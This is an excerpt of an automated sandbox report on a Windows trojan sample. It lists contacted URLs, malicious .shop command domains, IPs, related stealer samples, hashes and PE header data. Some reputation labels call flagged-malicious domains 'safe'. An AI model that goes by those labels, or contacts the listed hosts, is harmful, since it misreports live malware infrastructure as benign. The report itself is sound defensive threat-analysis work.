              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://plaintediousidowsko.shop/L0%Avira URL Cloudsafe
              https://plaintediousidowsko.shop/y0%Avira URL Cloudsafe
              https://plaintediousidowsko.shop:443/api0%Avira URL Cloudsafe
              boredimperissvieos.shop0%Avira URL Cloudsafe
              https://plaintediousidowsko.shop/~0%Avira URL Cloudsafe
              sweetsquarediaslw.shop0%Avira URL Cloudsafe
              https://plaintediousidowsko.shop/apiGM0%Avira URL Cloudsafe
              https://plaintediousidowsko.shop/xY0%Avira URL Cloudsafe
              https://plaintediousidowsko.shop/p0%Avira URL Cloudsafe
              boredimperissvieos.shop1%VirustotalBrowse
              https://plaintediousidowsko.shop:443/api10%VirustotalBrowse
              https://www.mozilla.or0%Avira URL Cloudsafe
              miniaturefinerninewjs.shop0%Avira URL Cloudsafe
              plaintediousidowsko.shop0%Avira URL Cloudsafe
              acceptabledcooeprs.shop0%Avira URL Cloudsafe
              zippyfinickysofwps.shop0%Avira URL Cloudsafe
              https://plaintediousidowsko.shop/p3%VirustotalBrowse
              https://plaintediousidowsko.shop/apiN0%Avira URL Cloudsafe
              obsceneclassyjuwks.shop0%Avira URL Cloudsafe
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
              plaintediousidowsko.shop1%VirustotalBrowse
              acceptabledcooeprs.shop1%VirustotalBrowse
              https://plaintediousidowsko.shop/api70%Avira URL Cloudsafe
              miniaturefinerninewjs.shop1%VirustotalBrowse
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              https://plaintediousidowsko.shop/apilo0%Avira URL Cloudsafe
              sweetsquarediaslw.shop1%VirustotalBrowse
              holicisticscrarws.shop0%Avira URL Cloudsafe
              obsceneclassyjuwks.shop1%VirustotalBrowse
              zippyfinickysofwps.shop1%VirustotalBrowse
              https://plaintediousidowsko.shop/0%Avira URL Cloudsafe
              https://plaintediousidowsko.shop/apil0%Avira URL Cloudsafe
              https://plaintediousidowsko.shop/api0%Avira URL Cloudsafe
              https://plaintediousidowsko.shop/10%Avira URL Cloudsafe
              https://plaintediousidowsko.shop/jAX0%Avira URL Cloudsafe
              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta0%Avira URL Cloudsafe
              https://plaintediousidowsko.shop/api10%VirustotalBrowse
              https://plaintediousidowsko.shop/0%VirustotalBrowse
              holicisticscrarws.shop1%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.214.172
              truefalseunknown
              plaintediousidowsko.shop
              104.21.53.146
              truetrueunknown
              fp2e7a.wpc.phicdn.net
              192.229.211.108
              truefalseunknown
              NameMaliciousAntivirus DetectionReputation
              boredimperissvieos.shoptrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              sweetsquarediaslw.shoptrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              miniaturefinerninewjs.shoptrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              plaintediousidowsko.shoptrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              acceptabledcooeprs.shoptrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              zippyfinickysofwps.shoptrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              obsceneclassyjuwks.shoptrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              holicisticscrarws.shoptrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://plaintediousidowsko.shop/apifalse
              • 10%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://duckduckgo.com/ac/?q=SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://ocsp.sectigo.com0SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exefalse
                  • URL Reputation: safe
                  unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164329381.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://plaintediousidowsko.shop:443/apiSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136279911.0000000001509000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 10%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://plaintediousidowsko.shop/LSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2129162443.000000000152B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://plaintediousidowsko.shop/ySecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2129162443.000000000152B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://x1.c.lencr.org/0SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163105093.0000000003B20000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://x1.i.lencr.org/0SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163105093.0000000003B20000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://plaintediousidowsko.shop/~SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2212060983.0000000003AF0000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://plaintediousidowsko.shop/apiGMSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2173793881.0000000003B00000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2171668626.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2174013392.0000000003B00000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2186916110.0000000003B00000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2179568486.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2179890214.0000000003AFD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2173644952.0000000003B00000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2173524997.0000000003AFE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://plaintediousidowsko.shop/xYSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2212060983.0000000003AF0000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://support.mozilla.org/products/firefoxgro.allSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163766849.0000000003C11000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://plaintediousidowsko.shop/pSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136279911.0000000001509000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 3%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.mozilla.orSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164205497.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://plaintediousidowsko.shop/apiNSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2129194928.000000000150D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://sectigo.com/CPS0SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exefalse
                          • URL Reputation: safe
                          unknown
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164329381.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164329381.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://crl.rootca1.amazontrust.com/rootca1.crl0SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163105093.0000000003B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://plaintediousidowsko.shop/api7SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2191414987.0000000003B09000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://ocsp.rootca1.amazontrust.com0:SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163105093.0000000003B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://plaintediousidowsko.shop/apiloSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2191414987.0000000003AFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.ecosia.org/newtab/SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163766849.0000000003C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://plaintediousidowsko.shop/SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2211686167.0000000001575000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164329381.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://ac.ecosia.org/autocomplete?q=SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exefalse
                                        • URL Reputation: safe
                                        unknown
                                        https://plaintediousidowsko.shop/apilSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2210158596.0000000003AFB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2191414987.0000000003AFC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2212116605.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2186916110.0000000003B00000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2210195171.0000000003B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164329381.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exefalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164329381.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2163105093.0000000003B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136659774.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136697812.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2136938821.0000000003B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://plaintediousidowsko.shop/1SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2129162443.000000000152B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://plaintediousidowsko.shop/jAXSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2209976994.0000000001570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2210314696.0000000001574000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000002.2211686167.0000000001575000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaSecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe, 00000000.00000003.2164329381.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              104.21.53.146
                                              plaintediousidowsko.shopUnited States
                                              13335CLOUDFLARENETUStrue
                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1435768
                                              Start date and time:2024-05-03 05:27:23 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 2m 35s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:3
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                              EGA Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Stop behavior analysis, all processes terminated
                                              • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net
                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              TimeTypeDescription
                                              05:28:20API Interceptor7x Sleep call for process: SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              104.21.53.146PL.exeGet hashmaliciousLokibotBrowse
                                              • bremileintl.ga/maka/fre.php
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              fp2e7a.wpc.phicdn.nethttp://www.paviarealestate.comGet hashmaliciousHTMLPhisherBrowse
                                              • 192.229.211.108
                                              https://sites.google.com/view/1017-docu-meusnme-office-ru/homeGet hashmaliciousUnknownBrowse
                                              • 192.229.211.108
                                              https://docs.google.com/drawings/d/1ir0TPTFrA2ZlsddUs_9uV_uLa1D8P2cUzCHWO0EIr4E/previewGet hashmaliciousUnknownBrowse
                                              • 192.229.211.108
                                              https://herozheng.com/Get hashmaliciousUnknownBrowse
                                              • 192.229.211.108
                                              https://www.67rwzb.cn/Get hashmaliciousUnknownBrowse
                                              • 192.229.211.108
                                              https://www.bjvpza.cn/Get hashmaliciousUnknownBrowse
                                              • 192.229.211.108
                                              https://jingxinwl.com/Get hashmaliciousUnknownBrowse
                                              • 192.229.211.108
                                              https://vpassz.xu4nblog.com/Get hashmaliciousUnknownBrowse
                                              • 192.229.211.108
                                              https://broken-rain-1a74.1rwvvy66.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                              • 192.229.211.108
                                              https://rdtetsyutfuyfrxytf.azurewebsites.net/Get hashmaliciousTechSupportScamBrowse
                                              • 192.229.211.108
                                              bg.microsoft.map.fastly.nethttps://herozheng.com/Get hashmaliciousUnknownBrowse
                                              • 199.232.210.172
                                              https://8952627338.z28.web.core.windows.net/?phone=09-70-18-72-82Get hashmaliciousUnknownBrowse
                                              • 199.232.210.172
                                              https://nthturn.com/Get hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              http://checkyourvehicle.ca/Get hashmaliciousUnknownBrowse
                                              • 199.232.210.172
                                              https://www.sqrhpva.cn/Get hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              http://digestbreathing.comGet hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              http://architecture-interior.comGet hashmaliciousUnknownBrowse
                                              • 199.232.210.172
                                              http://offices-support.comGet hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              http://olp8111as000.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                              • 199.232.210.172
                                              https://jhantmanturquoisemountaincom.msnd4.com/tracking/lc/d95da3e3-df10-4163-b4be-64d437a9dfaa/1098ed5d-1b9b-416f-b580-8b17cb830b97/19b1eb27-fde7-9da8-e5d8-66929bfd35ed/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                              • 199.232.210.172
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUShttp://www.borneomedicalcentre.com/en/wp-content/themes/eightmedi-lite/js/jquery.bxslider.min.jsGet hashmaliciousUnknownBrowse
                                              • 1.1.1.1
                                              STATEMENT OF ACCOUNT.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.13.205
                                              file.exeGet hashmaliciousLummaCBrowse
                                              • 172.67.189.159
                                              http://www.paviarealestate.comGet hashmaliciousHTMLPhisherBrowse
                                              • 104.22.0.204
                                              https://www.bjvpza.cn/Get hashmaliciousUnknownBrowse
                                              • 104.22.39.239
                                              file.exeGet hashmaliciousRisePro StealerBrowse
                                              • 104.26.4.15
                                              https://broken-rain-1a74.1rwvvy66.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                              • 172.64.154.107
                                              https://rdtetsyutfuyfrxytf.azurewebsites.net/Get hashmaliciousTechSupportScamBrowse
                                              • 104.17.25.14
                                              https://doc-54.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                              • 104.17.25.14
                                              https://www.uhnrya.cn/Get hashmaliciousUnknownBrowse
                                              • 104.22.39.239
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.53.146
                                              file.exeGet hashmaliciousRisePro StealerBrowse
                                              • 104.21.53.146
                                              2024 12_59_31 a.m..jsGet hashmaliciousWSHRATBrowse
                                              • 104.21.53.146
                                              Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                              • 104.21.53.146
                                              PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                              • 104.21.53.146
                                              Update on Payment.jsGet hashmaliciousWSHRATBrowse
                                              • 104.21.53.146
                                              deobfuscated.jsGet hashmaliciousUnknownBrowse
                                              • 104.21.53.146
                                              deobfuscated.jsGet hashmaliciousUnknownBrowse
                                              • 104.21.53.146
                                              GLAS_DeploymentMatrix_Full_26694_20240502_075604.xlsmGet hashmaliciousUnknownBrowse
                                              • 104.21.53.146
                                              vEaFCBsRb7.exeGet hashmaliciousRisePro StealerBrowse
                                              • 104.21.53.146
                                              No context
                                              No created / dropped files found
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.8860822175084575
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:SecuriteInfo.com.Trojan.GenericKD.72607091.32716.31681.exe
                                              File size:8'162'448 bytes
                                              MD5:2b9166e260cddbc58db20a0c54a6d145
                                              SHA1:1724225b1b9bbd1bd4c3f4a57b6479774dbb1a23
                                              SHA256:ab1686a078433d515b501f5423b3046d6d1f70b2c9be21d2d3bf71b5d8465107
                                              SHA512:cd93cc8366026919725c4a62c1df8fee907be23df54a2d2c5589b836c61e060a18e653a92d7933ae105ef75f228d41105a843ad36dc2a079abdfa153f6600202
                                              SSDEEP:196608:ZkgfplJyv7aqESXn/FmLlV7PUHCALVvo1n:ZVRbqESXn/qDzkbCn
                                              TLSH:AA8623DA2FC749EFC98324B49796EEFE73B2598DC685C8351BC6E0C06061B7E601A171
                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....1f.....................:......6.............@..................................w}...@........................................
                                              Icon Hash:1373e3eb5b098093
                                              Entrypoint:0xef9e36
                                              Entrypoint Section:.vmp
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x66311A18 [Tue Apr 30 16:19:36 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:6
                                              OS Version Minor:0
                                              File Version Major:6
                                              File Version Minor:0
                                              Subsystem Version Major:6
                                              Subsystem Version Minor:0
                                              Import Hash:1a02d69b15f5b6a928d42e49d3ab56e5
                                              Signature Valid:false
